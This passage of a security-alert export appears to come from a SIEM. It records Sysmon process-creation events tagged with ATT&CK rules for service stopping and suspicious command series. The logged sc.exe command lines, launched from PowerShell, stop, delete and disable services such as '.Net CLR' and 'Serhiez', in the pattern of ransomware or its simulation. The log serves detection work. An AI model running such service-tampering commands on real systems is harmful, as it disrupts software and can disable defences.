MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.175"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010bc561e00}"",""processId"":""6660"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.417",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.123 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001053531e00} +ProcessId: 5928 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.127192500Z"",""eventRecordID"":""2459"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.123\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001053531e00}\r\nProcessId: 5928\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.123"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001053531e00}"",""processId"":""5928"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.353",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.033 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001046501e00} +ProcessId: 3460 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.035954600Z"",""eventRecordID"":""2457"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.033\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001046501e00}\r\nProcessId: 3460\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.033"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001046501e00}"",""processId"":""3460"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.323",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.019 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010ce4e1e00} +ProcessId: 6864 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.021879400Z"",""eventRecordID"":""2456"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.019\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010ce4e1e00}\r\nProcessId: 6864\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.019"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010ce4e1e00}"",""processId"":""6864"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.275",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.974 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010614c1e00} +ProcessId: 6548 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.977914600Z"",""eventRecordID"":""2453"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.974\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010614c1e00}\r\nProcessId: 6548\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.974"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010614c1e00}"",""processId"":""6548"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.229",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.926 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010dc491e00} +ProcessId: 7300 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.929374500Z"",""eventRecordID"":""2450"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.926\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010dc491e00}\r\nProcessId: 7300\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.926"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010dc491e00}"",""processId"":""7300"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.212",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.910 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00100b491e00} +ProcessId: 8100 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Serhiez Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.913491900Z"",""eventRecordID"":""2449"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.910\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00100b491e00}\r\nProcessId: 8100\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.910"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00100b491e00}"",""processId"":""8100"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Serhiez Start= 